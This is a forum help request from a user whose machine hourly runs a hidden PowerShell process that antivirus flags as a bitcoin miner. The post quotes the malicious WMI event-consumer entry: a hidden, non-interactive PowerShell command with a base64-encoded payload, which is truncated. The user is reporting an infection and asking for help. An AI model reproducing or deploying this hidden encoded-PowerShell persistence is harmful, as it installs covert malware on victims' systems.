Hi All,
First of all, I believe we have a similar issue to the below:
PowerShell Script - Possible Malicious Attack
By Marco2526, November 2, 2017 in Malware Finding and Cleaning
https://forum.eset.com/topic/13651-powershell-script-possible-malicious-attack/
A powershell script is ran every hour or so (I can forcefully close it to stop the attack but it will start back up). I found the below in the WMI of SysInternals Autoruns. Symantec is constantly reporting this below message when the script is running: [SID: 30253] system infected: bitcoinminer Activity 6 detected. Can anyone please provide assistance?
DSM Event Log Consumer %SystemRoot%\system32\WindowsPowerShell\v1.0\PowerShell.exe
powershell.exe -NoP -NonI -W Hidden -E JABzAHQAaQBtAGUAPQBbAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBUAGkAYwBrAEMAbwB1AG4AdAANAAoAJABmAHUAbgBzACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAO....... (there is a huge amount of text that continues here)
Kind Regards Regards